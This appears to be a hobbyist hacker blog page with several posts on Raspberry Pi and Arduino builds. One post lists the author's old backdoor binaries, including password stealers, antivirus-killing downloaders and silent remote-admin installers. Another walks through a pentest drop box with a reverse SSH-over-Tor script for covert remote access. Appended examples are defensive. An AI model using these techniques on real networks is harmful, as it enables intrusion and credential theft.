Pi Bar

Built from parts printed on a Makerbot Replicator 2X 3D printer, some square metal rods, and a series of 5 peristaltic pumps. The project was based on a project called Bar Mixvah. The problem with the original is that you had to use a sluggish MongoDB database and a laptop in order to get it up and running. I wanted something that was self-contained. Using an old Raspberry Pi with 256MB of RAM, I worked with a few guys from NESIT to redesign the top portion to fit the Raspberry Pi into, and then created a slim MySQL backend with PHP and node.js.


[Photos: the Pi hat that connects the pumps to the Pi]

Old Code

This is just a post to preserve some old backdoor programs I wrote 10+ years ago, which I used to mischievously learn programming and the Windows API. I no longer have the source for them. If I can dig it up I’ll post it along with the binaries.


Acid Reign 1.0
Coded in ASM 9/2001
The first program I wrote was a web downloader; the client was in Visual Basic and the server was in ASM.
Acidreign
Version 2.0 coded in ASM 5/9/2002
Acidreign2.0


trILLian rape ver. 1.0
Coded in ASM 4/27/2002
A 2.45kb Trillian pws (password stealer) that sends user names and passwords to your ICQ number.
Trillianrape1.0


ILL-Eagle 1.0
Coded in ASM 5/20/2002
A 1.62kb web downloader that will download any Visual Basic file from a website and execute it. Works on win9x/me/nt/2k/xp.
*checks to see if Msvbvm60.dll is in the system directory; if not, it downloads it
*once downloaded, runs the file hidden
*melts itself after the file is downloaded, removing any traces of itself
Ill_eagle1.0


mini-web vers. 1.0
Coded in ASM 6/2/2002
A 1kb web downloader that will download any file from a website and execute it. Works on win9x/me/nt/2k.
Miniweb1.0


kILLer webdlr vers. 1.0
Coded in ASM 6/12/2002
A 3.1kb web downloader that will download any file from a website and execute it. Also kills any AVs and firewalls that are running. Works on win9x/me/nt/2k/xp.
Webdownloader_killer1.0


Shut-it Downloader vers. 1.0
Coded in ASM 6/17/2002
A 3.5kb web downloader that will download any file from a website and execute it. Also kills any AVs and firewalls that are running. Works on win9x/me/nt/2k/xp.
Webdownloader_shut-it1.0


half life jacker ver. 1.0
Coded in ASM 10/19/2002
A 1.35kb app that sends the Half-Life CD key to your ICQ number.
Halflifejacker1.0


WebcamNow Jacker
Coded in ASM 6/2003
Snags the saved password from the registry and sends it to an ICQ number
Webcamnow


CMDGet 1.0
Coded in ASM 8/2003
Downloads a file from a website using parameters the user provides on the command line/DOS prompt/shell.
Directions:
type: CMDGet


Ghost Radmin 1.0
Coded in ASM 9/2003
A 1.26kb program that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp. Basically it downloads the Radmin server and DLL from the web and adds the proper registry keys for it to function.
Ghost_radmin1.0


NCWrapper 1.0
Coded in ASM 1/30/04
Automatically expands Netcat to the Windows directory and executes user-chosen parameters. *self-deletes after expanding/running commands (netcat is left running)
Ncwrapper1.0


mini-web vers. 2.0
Coded in ASM 2/10/04
A 1.5kb web downloader. Compressed with FSG it is only 977 bytes. Works on win9x/me/nt/2k.
Miniweb2.0


Ghost Radmin 2.1
Coded in ASM 6/15/2004
A 1.24kb program that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp. Basically it downloads the Radmin server and DLL from the web and adds the proper registry keys for it to function. (Default port is 4899 and pass is LetMeIn.)
Ghost_radmin2.1


Ghost Radmin Generator 1.0
Coded in ASM 10/6/04
Generates a dropper that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp. Extracts the Radmin server and DLL from itself and adds the proper registry keys for it to function (default pass is 12345678). Self-deletes after installing Radmin.
Ghost_radmin1.0gen


To Catch a Thief

Due to my car getting broken into 2 times in the past few weeks, I decided to use the opportunity to make a project out of it. One of our members had bought a Seeed Studio GPRS Arduino shield last year for a project, but it was sitting around collecting dust, so I asked him if I could borrow it.

The device uses an unlocked SIM card to send out SMS text messages (it can also be used for voice and data). I worked with a few guys at NESIT to figure out the best way to trigger the device. Our option was to connect the interior light to pin2 on the Arduino, so that when the light turned on the 12 volts would trigger the shield to send the SMS. I also added a 10kΩ resistor inline to drop the voltage so it wasn’t feeding a full 12v back into the Arduino. To power the device I was originally going to go with a 9v battery, but since my car’s cigarette lighter stays on when the car is off I decided to use that to power the device so I didn’t have to worry about the 9v battery dying.

So, hacking up an old phone charger wire, I used a perf board to solder together a 0.1uF capacitor and an LM7805 voltage regulator to drop the voltage from 12v to 5v to feed into the Arduino. I also added a 5.1k resistor to ground. This is the design that member Cobey had drawn up for the connections.

The SIM card that he had no longer worked since it was over a year old, so I stopped by Walmart and bought an AT&T GoPhone SIM card for $10 and a recharge/refill card for $15. It was as simple as calling the number provided on the package, putting in the refill card PIN info, and giving the GPRS shield’s IMEI printed on the SIM900 chip.

After a few tests I finally got it working, so all I need to do is hook it up to my lighter, then hook pin2 up to my interior light underneath the dash.

When my original $15 is up, AT&T said I can convert my GoPhone plan over to text only for $5/month, so it’s pretty cheap.

If you would like to build a similar device, the cheapest I’ve seen for an Arduino clone is $13.50 ::HERE::

And the GPRS shield was $30 ::HERE::

Find yourself a nice case for them (I ended up using a weatherproof AT&T DSL box) and you’ll be off and running for about $70 total including the SIM card and first month.

The Arduino source code is available ::HERE:: you just need to change the phone number to your own number and upload it to your Arduino.

Thanks to Cobey, Devin, and Gary for helping out with the project; one of the great things about a hackerspace is that you have people to turn to when you have questions. I’ll be updating soon with results if my device is triggered :)

MiniPwner – Evil Network Dropbox


The MiniPwner is a penetration testing “drop box”: a small, cheap, and simple but powerful device that can be inconspicuously plugged into a network and provide the penetration tester remote access to that network. I purchased this device for a project here @ NESIT and thought it packed quite a punch for only $23, compared to the Pwnie Express plugs which run upwards of $500. And at that price you could afford to lose one or two on a pentesting job and not be hurting :p

Some of the features of the minipwner include:

Atheros 400MHz MIPS CPU
32MB RAM
4MB flash
10/100Mbps Ethernet interface
802.11b/g/n wireless interface with one internal antenna
USB 2.0 port
Micro-USB power socket, approximately 1W power draw
5.7cm x 5.7cm x 1.8cm dimensions
Nmap network scanner
Tcpdump sniffer
Netcat Hacker’s swiss army knife
aircrack Wireless network analysis
kismet Wireless network analysis
perl Perl Scripting Language
openvpn VPN Client and Server
dsniff suite of sniffing and spoofing tools, including arpspoof
nbtscan NetBIOS Network Scanner
snort Sniffer, Packet Logger, Intrusion Detection System
karma Wireless Sniffing Tool
samba2-client Windows File Sharing Client
elinks Text Based Web Browser
yafc FTP Client
openssh-sftp-client Secure File Transfer Client

So after doing the initial install of the OpenWrt firmware and configuring the other applications, I came across an awesome article on SecurityGeneration.com which described some James Bond type shit: having your Pwnie Express connect back to you over Tor so you would essentially be untraceable. Instead of having it connect back through ssh to your IP address, you would be connecting back to a Tor *.onion address. But since I don’t have a Pwn Plug, the only problem that lay ahead was converting the instructions to work on this MiniPwner box. Now I’m not an expert on getting this shit configured properly, so I relied on some help from friends and general guessing to get it up and running, so your mileage may vary.

I’m not going to rehash getting MiniPwner onto the TP-Link here, so I’ll pick up where his article left off. And I’m not going to rehash getting your Tor hidden server running; follow step 1 of SecurityGeneration’s article if you need to figure it out.

The first thing I did was get Tor installed on the USB drive (which should already be set up per the original instructions on the MiniPwner site):

opkg --dest usb install tor-geoip

then symlink it

ln -s /mnt/usb/usr/share/tor /root/.tor

edit the tor config file

vi /etc/tor/torrc

Scroll to the bottom and change User tor to User root.
Next find DataDirectory /var/lib/tor and change it to /mnt/usb/usr/share/tor/lib, then save the config file. This points Tor’s data directory at the USB drive; otherwise Tor will start writing to the MiniPwner’s flash memory and soon it’ll be full. You should be able to start Tor with no errors by typing tor. As long as it works, you might wanna have Tor start when the MiniPwner powers up.

add tor to default run level (startup):

cd /etc/rc.d
ln -s ../init.d/tor S99tor

Now the hardest part of the instructions was to wget connect.c and compile it. By default OpenWrt doesn’t have anything to compile programs with in their repository, so it’s a clusterfuck because you need to cross-compile connect.c for the MiniPwner’s MIPS architecture on another box using the toolchain shit, then send it over to your MiniPwner and pray that it works. Luckily I already went through this and have the binary ::here::. I’ll write more about doing this at a later time. So, all you need to do is:

wget http://nesit.org/files/connect
mkdir /usr/local/
mkdir /usr/local/bin/
mv connect /usr/local/bin/connect
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Now we need to get OpenSSH on the MiniPwner:

opkg --dest usb install openssh-client-utils

Then we need to edit the ssh config file

vi /etc/ssh/ssh_config

add these 2 lines to the bottom and save the config:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

Then I made a simple script to automate connecting back to your hidden Tor server. Just change blablablabla.onion to your .onion address and SSH_user to your username:

vi reversessh.sh

#!/bin/sh
# Reverse SSH over Tor: the MiniPwner connects out to the hidden service and
# asks the remote sshd to listen on its port 3330, forwarding back to our port 22.
Rec_Port=22
Remote_Tor=blablablabla.onion
SSH_user=anonymous
SSH_key="/root/.ssh/id_rsa"
# -N: no remote command, -R: remote forward. The Host *.onion block added to
# ssh_config above routes this through connect(1) to the Tor SOCKS port.
/mnt/usb/usr/bin/ssh -NR 3330:localhost:22 -i "$SSH_key" "$SSH_user"@"$Remote_Tor" -p "$Rec_Port"

then save and chmod

chmod 0755 reversessh.sh

If all goes well you should be able to

./reversessh.sh

and on your hidden Tor server you can just run watch "netstat -lntup"; you should see:

tcp 0 0 127.0.0.1:3330 0.0.0.0:* LISTEN 15007/sshd: anonymous

You should be able to

ssh root@localhost -p 3330

You should be connected to your MiniPwner over Tor 🙂
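Flip this around for a second: that netstat line is also exactly what an admin on the hidden-service box (or any ssh server) would look for to spot an ssh -R listener they didn’t set up. As an added example that is not part of the original write-up, here is a small Python script that parses netstat -lntup output and flags LISTEN sockets owned by a per-session sshd: <user> process on any port other than the daemon’s own. The netstat text inside it is constructed sample output in net-tools layout, with the 127.0.0.1:3330 line from above included.

```python
"""Flag ssh remote-forward listeners in `netstat -lntup` output.

Added example, not from the original write-up. The post checks
`watch "netstat -lntup"` on the hidden-service box for a line such as
`tcp 0 0 127.0.0.1:3330 0.0.0.0:* LISTEN 15007/sshd: anonymous`. A LISTEN
socket owned by a per-session `sshd: <user>` process, on a port other than the
daemon's own, is the server-side footprint of `ssh -R`; this script picks those
rows out so the same check can run from cron or feed a monitoring job.
"""
import re

# Constructed sample (net-tools `netstat -lntup` layout); PIDs and ports are
# made up apart from the 127.0.0.1:3330 row, which mirrors the post's line.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1024/sshd
tcp        0      0 127.0.0.1:3330          0.0.0.0:*               LISTEN      15007/sshd: anonymous
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      987/tor
tcp6       0      0 :::22                   :::*                    LISTEN      1024/sshd
tcp6       0      0 ::1:3331                :::*                    LISTEN      15007/sshd: anonymous
udp        0      0 0.0.0.0:68              0.0.0.0:*                           512/dhclient
"""

# "PID/sshd: user" is how netstat -p shows a per-session sshd; the listening
# daemon itself shows as "PID/sshd" with no colon.
SESSION_SSHD = re.compile(r"^(?P<pid>\d+)/sshd: (?P<user>\S+)")


def split_addr_port(addr):
    """Split 'host:port'; the port is always the last colon-separated field,
    which also handles IPv6 forms like ':::22' and '::1:3331'."""
    host, _, port = addr.rpartition(":")
    return host, int(port)


def find_reverse_forward_listeners(netstat_output, ssh_port=22):
    """Return (host, port, pid, user) for each LISTEN socket owned by a
    per-session sshd on a port other than ssh_port."""
    hits = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # TCP rows: proto recv-q send-q local foreign state pid/program...
        # UDP rows have no State column, so they never satisfy this test.
        if len(fields) < 7 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue
        match = SESSION_SSHD.match(" ".join(fields[6:]))
        if not match:
            continue
        host, port = split_addr_port(fields[3])
        if port == ssh_port:
            continue
        hits.append((host, port, int(match.group("pid")), match.group("user")))
    return hits


def summarize(hits):
    """Human-readable one-liners, e.g. for a cron mail or a log forwarder."""
    return [f"{user} (pid {pid}) holds a remote forward listening on {host}:{port}"
            for host, port, pid, user in hits]


if __name__ == "__main__":
    for line in summarize(find_reverse_forward_listeners(SAMPLE_NETSTAT)):
        print(line)
```

Pipe real output in with `netstat -lntup | python3 this_script.py` after swapping the sample for `sys.stdin.read()`; if the box only has iproute2’s ss rather than net-tools netstat, the column layout differs and the field indexes would need adjusting.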

If anyone has anything to add/fix to this please hit me up illwill at illmob.org. Thnx to |m| & inhibit for help on getting this working.

RFPiD – Raspberry Pi Access Control

We’ve been working on our new door entry system for NESIT that will allow members to enter the space through our sliding door. This will replace our current Arduino RFID door access system. It utilizes an RFID card reader that checks the tag against a SQLite database, then opens the door by triggering a 5v relay connected to a garage door opener. It also tweets to Twitter.com when someone arrives @ the space, as well as logging the arrival in the database. Connected to the front of the device is a small 4.5” LCD screen, connected via S-video, that plays videos when someone scans their card.

The door can also be controlled over GoogleTalk from multiple Google accounts. An authorized user can open and close the door, add or remove users from the database, query the database accounts, check the current temperature, do callerID lookups and geoIP lookups, play sounds/videos, and send messages to its Twitter account. All this can be done right from your cell phone or laptop.

The door also has a PIR sensor that will sense when someone’s walking by and asks them to press the pushbutton on the front if they want to learn more about NESIT. When they press it, it’ll play a short promo video about us.


A sample of the base RFPiD python code is available here: Github

The idea:
This project came out of necessity. With the amount of members we have, it made more sense to make an automated door access system than to give everyone keys. We originally used an Arduino for the last 2 years, but we wanted to be able to control the database of users more easily; our current setup wrote the users to the EEPROM of the Arduino. We were thinking about using an ethernet module to talk with a server on our network, but if our network had issues that would prevent someone from entering. The small footprint of the Pi makes it a better choice than running a server full-time. Our modest server burns through around $200 a year worth of electricity. By comparison a Raspberry Pi consumes about $3 per year. With the Raspberry Pi we could now have ethernet capabilities, store its own database, GPIO pins, video output and more.

Starting the project I needed to figure out how to interface an RFID reader with the Pi. I wanted to interface it with the UART pins, but due to time constraints I ended up using a SparkFun USB adapter with my Innovations ID-20 RFID reader. The only thing I had to do was monitor the USB device in /dev and receive the RFID tag ID when someone scanned their card. To do this I used a Python script that monitored the serial connection on /dev/ttyUSB0 (the base of this script is what I have posted to my GitHub account) and used a sqlite3 database to verify whether the card scanned belonged to a valid member; if so, it would trigger the door. I also used an RGB LED to indicate whether the card was good or not.
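The two things that script has to get right before it touches the relay are (a) not trusting whatever bytes show up on /dev/ttyUSB0 and (b) keeping the tag string out of the SQL text. As an added example (not the RFPiD code from the GitHub repo), here is a Python sketch of that path: it validates an ID-20 frame, including the reader’s XOR checksum, then does a parameterised sqlite3 lookup and logs the attempt. The serial port is replaced by constructed byte strings and the database lives in memory so it runs offline; the table and column names are my assumptions, not the project’s schema.

```python
"""Validate an ID-20 RFID frame and check the tag against SQLite.

Added example; this is not the RFPiD code from the GitHub repo linked above.
The Innovations ID-12/ID-20 readers emit one ASCII frame per scan: STX (0x02),
ten hex characters of tag data, two hex characters of checksum, CR, LF and
ETX (0x03), where the checksum is the XOR of the five data bytes (per the
reader datasheet). The post's script reads such frames from /dev/ttyUSB0 and
looks the tag up in a sqlite3 database; here the serial port is replaced by
constructed byte strings and the database lives in memory so it runs offline.
The table and column names are assumptions, not the project's schema.
"""
import sqlite3
import string

STX, ETX = 0x02, 0x03
FRAME_LEN = 16          # STX + 10 data + 2 checksum + CR + LF + ETX


def parse_id20_frame(frame: bytes):
    """Return the 10-character tag ID, or None if the frame is malformed or
    its checksum does not match. Nothing else reaches the database."""
    if len(frame) != FRAME_LEN or frame[0] != STX or frame[-1] != ETX:
        return None
    if frame[13:15] != b"\r\n":
        return None
    body = frame[1:13]
    if not all(chr(c) in string.hexdigits for c in body):
        return None
    data = bytes.fromhex(body[:10].decode("ascii"))
    checksum = int(body[10:12], 16)
    calc = 0
    for b in data:
        calc ^= b
    if calc != checksum:
        return None
    return body[:10].decode("ascii").upper()


def make_frame(tag_hex: str) -> bytes:
    """Build a well-formed reader frame for a tag; used only to construct samples."""
    cs = 0
    for b in bytes.fromhex(tag_hex):
        cs ^= b
    return (bytes([STX]) + tag_hex.encode("ascii") + f"{cs:02X}".encode("ascii")
            + b"\r\n" + bytes([ETX]))


# Constructed sample frames (not real member tags).
GOOD_FRAME = b"\x020A0B0C0D0E0E\r\n\x03"      # tag 0A0B0C0D0E, checksum 0E
BAD_CHECKSUM = b"\x020A0B0C0D0EFF\r\n\x03"    # same tag, wrong checksum
NOT_HEX = b"\x02ZZZZZZZZZZ00\r\n\x03"         # line noise, not a tag

SCHEMA = """
CREATE TABLE members (
    tag TEXT PRIMARY KEY, name TEXT NOT NULL, active INTEGER NOT NULL DEFAULT 1);
CREATE TABLE entry_log (
    ts TEXT DEFAULT CURRENT_TIMESTAMP, tag TEXT NOT NULL, name TEXT,
    granted INTEGER NOT NULL);
"""


def open_db():
    """In-memory stand-in for the on-disk sqlite3 member database."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO members (tag, name, active) VALUES (?, ?, ?)",
                   [("0A0B0C0D0E", "alice", 1), ("1122334455", "bob", 0)])
    return db


def check_tag(db, tag):
    """Parameterised lookup (the tag came off a serial line; never build SQL
    from it). Logs every attempt and returns (granted, name)."""
    row = db.execute("SELECT name, active FROM members WHERE tag = ?", (tag,)).fetchone()
    name = row[0] if row else None
    granted = bool(row and row[1])
    db.execute("INSERT INTO entry_log (tag, name, granted) VALUES (?, ?, ?)",
               (tag, name, int(granted)))
    db.commit()
    return granted, name


def handle_scan(db, frame):
    """One scan: validate the frame first, then decide whether to fire the relay."""
    tag = parse_id20_frame(frame)
    if tag is None:
        return False, None      # garbage on the line: no lookup, relay stays off
    return check_tag(db, tag)


if __name__ == "__main__":
    db = open_db()
    for f in (GOOD_FRAME, make_frame("1122334455"), make_frame("DEADBEEF00"),
              BAD_CHECKSUM, NOT_HEX):
        print(repr(f), "->", handle_scan(db, f))
```

On the real device the frame would come from a pyserial read up to ETX, and the relay/LED calls would hang off the returned `granted` flag; the active column is there so a lost card can be disabled without deleting its log history.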

With the RFID stuff working it was time to pick out a good enclosure. We had a few old outdoor phone boxes laying around the space, these are the same ones you would commonly see being used for phone service hookup outside of your house. These were perfect because the plastic is thick and sturdy and you are able to lock the case. The first thing we had to do was gut the inside, which consisted of removing the electronics and dremeling the plastic to fit everything inside the box.


Since the Pi supported S-video out, I found a cheap 4.5” LCD screen on Amazon that was from a car backup camera system that had S-video inputs. I cut out the front of the box and fit the screen into place. So now when someone entered it would play a video corresponding to that user.

I also started modding a Python script for GoogleTalk from mitchtech.net that allowed me to control the Pi from my Android phone by sending it commands. I added code to allow multiple bot admins, let me add/remove/modify users in the RFID card database, check the current temperature, do callerID lookups and geolocate IP addresses. I also added Twitter capabilities, so when someone entered the space the Pi would tweet who entered and at what time. This served as sort of a backup to our entry log, and let other members know who was currently at the space.


Originally I was going to use a 12v door actuator with our normal door, which you will see in some of the videos, but we also had a sliding door that one of our members decided to hook up to a garage door opener. So now all I had to do was interface the garage door trigger with a 5v relay. I also added an arcade button so members can open the door from inside the space.

I added a tamper button inside that sends out an email alert if someone tries to open the case; it also curls an image from the IP camera we have outside the door. Another button in front plays a promo video when someone presses it. The final thing I installed was a PIR sensor: it waits for movement, such as someone walking by, and beckons them to press the button to play a randomly picked NESIT promo video.

The power for the device was a power supply for an external hard drive. The great thing about it is that it outputs 5v and 12v natively so I didn’t have to muck around with stepping the voltages up or down. You can get one on eBay etc for about $7. This helped because the LCD screen runs on 12v and the other components run off 5v. I installed a mounting block inside to help run all the wires to each device.


All the Python code and C code runs from bootup and/or cron jobs that check to see if the scripts are running and restart them if needed, to keep the device running perfectly.

In total the project was around $160
$40 for PI
$50 for RFID and USB breakout board
$20 for LCD
$30 for used garage door opener
$3 for PIR sensor
$10 for wiring, 4gb SD card, LEDs, and resistors
$4 for Temp sensor


To be continued….

SlapBoxing

A small program in MASM that simulates the old phone blue box (MF tones) & DTMF tones. It essentially plays the tones from .mp3 files that have been modified to act like .wav files so the file size is small. They are then embedded in the application as a resource. You just press the button to hear the tone. Download it ::HERE::
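For anyone curious what is actually in those tone files: each DTMF key is just two sine waves added together, one from the row group (697/770/852/941 Hz) and one from the column group (1209/1336/1477/1633 Hz), and the receiving end picks the key by measuring energy at those eight frequencies. As an added example that is not SlapBoxing’s own code, here is a Python version that synthesises a key tone and decodes it back with the Goertzel algorithm; the sample rate, tone length and detection threshold are choices made here, not taken from SlapBoxing.

```python
"""Synthesise and decode DTMF key tones.

Added example, not the SlapBoxing program itself. SlapBoxing plays canned tone
files; this shows what is in them: every DTMF key is the sum of one low-group
and one high-group sine wave (the standard 697/770/852/941 Hz and
1209/1336/1477/1633 Hz sets), and a decoder recovers the key by measuring the
energy at each of those eight frequencies with the Goertzel algorithm.
Standard library only, so it runs offline; the sample rate, tone length and
threshold below are choices made for this example.
"""
import math

SAMPLE_RATE = 8000                      # telephone-band sampling rate
LOW_FREQS = (697, 770, 852, 941)        # keypad rows
HIGH_FREQS = (1209, 1336, 1477, 1633)   # keypad columns
KEYPAD = ("123A", "456B", "789C", "*0#D")


def key_to_freqs(key):
    """Map a keypad character to its (low, high) frequency pair."""
    for r, row in enumerate(KEYPAD):
        c = row.find(key)
        if c >= 0:
            return LOW_FREQS[r], HIGH_FREQS[c]
    raise ValueError(f"not a DTMF key: {key!r}")


def synth_tone(freq, duration=0.1, amplitude=0.45, rate=SAMPLE_RATE):
    """Float samples of a single sine wave."""
    n = int(duration * rate)
    return [amplitude * math.sin(2 * math.pi * freq * i / rate) for i in range(n)]


def synth_dtmf(key, duration=0.1, rate=SAMPLE_RATE):
    """One key press: the two component tones added sample by sample."""
    f_lo, f_hi = key_to_freqs(key)
    lo = synth_tone(f_lo, duration, rate=rate)
    hi = synth_tone(f_hi, duration, rate=rate)
    return [a + b for a, b in zip(lo, hi)]


def goertzel_power(samples, freq, rate=SAMPLE_RATE):
    """Signal energy at one frequency via the Goertzel recurrence, i.e. a
    single DFT bin without computing the whole transform."""
    coeff = 2.0 * math.cos(2.0 * math.pi * freq / rate)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    return s_prev ** 2 + s_prev2 ** 2 - coeff * s_prev * s_prev2


def decode_dtmf(samples, rate=SAMPLE_RATE, min_ratio=10.0):
    """Return the key whose row and column tones dominate, or None when there
    is no clear dual tone (silence, noise, or a lone single frequency)."""
    lo = [goertzel_power(samples, f, rate) for f in LOW_FREQS]
    hi = [goertzel_power(samples, f, rate) for f in HIGH_FREQS]
    r, c = lo.index(max(lo)), hi.index(max(hi))
    # Each winner must stand well above the runner-up in its own group.
    lo_rest = max(p for i, p in enumerate(lo) if i != r)
    hi_rest = max(p for i, p in enumerate(hi) if i != c)
    if lo[r] < min_ratio * max(lo_rest, 1e-12) or hi[c] < min_ratio * max(hi_rest, 1e-12):
        return None
    return KEYPAD[r][c]


def decode_sequence(keys):
    """Round-trip a string of keys through the synthesiser and decoder."""
    return "".join(decode_dtmf(synth_dtmf(k)) or "?" for k in keys)


if __name__ == "__main__":
    print(decode_sequence("0123456789*#ABCD"))
```

The ratio test in decode_dtmf is what keeps a single tone or silence from being reported as a key; a real detector would also want the tone to persist for a minimum duration before accepting it.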